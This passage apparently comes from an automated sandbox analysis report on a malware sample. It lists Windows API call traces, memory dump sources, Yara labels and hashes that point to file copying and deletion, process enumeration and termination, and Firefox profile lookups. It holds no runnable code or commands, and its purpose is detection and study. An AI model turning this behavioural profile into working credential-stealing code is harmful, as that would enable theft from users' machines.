                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                            • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                            • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                            • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0302D6E8
                                            • lstrlen.KERNEL32(00000000), ref: 0302D8FF
                                            • lstrlen.KERNEL32(00000000), ref: 0302D913
                                            • DeleteFileA.KERNEL32(00000000), ref: 0302D992
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                            • Instruction ID: b82cf51a28ba781a1fff9cbf9aaca86729d3063eb1a3c686bfbe537a36aff9d2
                                            • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                            • Instruction Fuzzy Hash: 0B91117AA113589BCB08FBA4DD90DEE733DAF97201F544169E1467A0A0EF346B48CF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                            • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                            • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                            • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0302DA68
                                            • lstrlen.KERNEL32(00000000), ref: 0302DC06
                                            • lstrlen.KERNEL32(00000000), ref: 0302DC1A
                                            • DeleteFileA.KERNEL32(00000000), ref: 0302DC99
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                            • Instruction ID: 177b277813e757d15761a728b751ee262aaa216f25019bf71d5802513669e02b
                                            • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                            • Instruction Fuzzy Hash: 0D81217AA113589BCB08FBA4DD90DEE733DAF97201F54455DE046AA0A0EF346B48CF61
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                            • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                            • API String ID: 998311485-3310892237
                                            • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                            • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                            • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                            • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                            APIs
                                            • memset.MSVCRT ref: 004194EB
                                              • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                              • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                              • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                            • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 396451647-0
                                            • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                            • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                            • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                            • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                            APIs
                                            • memset.MSVCRT ref: 03039752
                                              • Part of subcall function 03038FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,03039785,00000000), ref: 03038FC2
                                              • Part of subcall function 03038FB7: RtlAllocateHeap.NTDLL(00000000), ref: 03038FC9
                                              • Part of subcall function 03038FB7: wsprintfW.USER32 ref: 03038FDF
                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 03039812
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 03039830
                                            • CloseHandle.KERNEL32(00000000), ref: 0303983D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                            • String ID:
                                            • API String ID: 3729781310-0
                                            • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                            • Instruction ID: c2b56c2a01c4cdd754ae1a86a00408e4e45aef70ade6350d47599b676002f337
                                            • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                            • Instruction Fuzzy Hash: 60313A79E02348EFDB14DFE0CC48BEDB7B9EF4A700F104459E506AA184DBB46A84CB51
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                            • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                            • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • CloseHandle.KERNEL32(?), ref: 00418761
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                            • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                            • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                            • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 03038931
                                            • Process32First.KERNEL32(?,00000128), ref: 03038945
                                            • Process32Next.KERNEL32(?,00000128), ref: 0303895A
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • CloseHandle.KERNEL32(?), ref: 030389C8
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                            • String ID:
                                            • API String ID: 1066202413-0
                                            • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                            • Instruction ID: 2fb4d37b90add5361dfad75168d0ce0aa5d73cb8bf76e926534239f39d318fc4
                                            • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                            • Instruction Fuzzy Hash: 32314F76A42658ABCB24DF94DD44FEEB77CEB46700F104199E10AA61A0DB346F44CF91
                                            APIs
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                            • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                            • lstrcatA.KERNEL32(?,02E26220), ref: 00414FAB
                                            • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                            • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                            • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                            • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcessstrtok_s
                                            • String ID:
                                            • API String ID: 3407564107-0
                                            • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                            • Instruction ID: 4d7fa0bc9d49512c6390a96a06853dfcdc2451ea5bf415cd1972a2d9442926d1
                                            • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                            • Instruction Fuzzy Hash: AD1158B8911209EFCB04EFE4D948AEDBBB9FF49305F048469E80667290E7306B04CF55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                            • wsprintfA.USER32 ref: 004179F3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 1243822799-0
                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 03037C17
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03037C1E
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 03037C2B
                                            • wsprintfA.USER32 ref: 03037C5A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 377395780-0
                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction ID: 66ddb1e39d91994321f976b73828c8b3625949605ee20e21878d4000e29cbe59
                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                            • Instruction Fuzzy Hash: 0E1127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D2395940CBB1
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 03037CCA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03037CD1
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 03037CE4
                                            • wsprintfA.USER32 ref: 03037D1E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 3317088062-0
                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction ID: 1c71de93a709a38b29bdb29eab4a130bb1c6c6b6590483dca91d451db4ed51ae
                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction Fuzzy Hash: 33115EB1A46218EFEB20CB54DC49FA9B7B8FB05721F10479AE51AA32C0C77459408F51
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s
                                            • String ID:
                                            • API String ID: 3330995566-0
                                            • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                            • Instruction ID: f2076436b6bd1775747d08f9f586bf5a072b5c5dd17534f36e78e68f99943362
                                            • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                            • Instruction Fuzzy Hash: E31139B8E00209EFDB14CFE6E988BEEBBB9FB09705F10C469E025A6250D7749501CF55
                                            APIs
                                            • CreateFileA.KERNEL32(03033D55,80000000,00000003,00000000,00000003,00000080,00000000,?,03033D55,?), ref: 03039563
                                            • GetFileSizeEx.KERNEL32(000000FF,03033D55), ref: 03039580
                                            • CloseHandle.KERNEL32(000000FF), ref: 0303958E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID:
                                            • API String ID: 1378416451-0
                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction ID: a30dbd30d040e3985d04672aa46d51338c6aec5bdfcf302250a40dc1a40f6ea4
                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                            • Instruction Fuzzy Hash: ECF04F39E40208BBEB20DFF0DC49B9E77BEEB4A710F10C694FA11A7280D77596418B40
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 03036D31
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03036D4F
                                            • CloseHandle.KERNEL32(00000000), ref: 03036D60
                                            • Sleep.KERNEL32(00001770), ref: 03036D6B
                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 03036D81
                                            • ExitProcess.KERNEL32 ref: 03036D89
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                            • Instruction ID: a63a839a417a4c22b8d8b0e661f3229b3013d951c1d217f3e525f67a9aecf94b
                                            • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
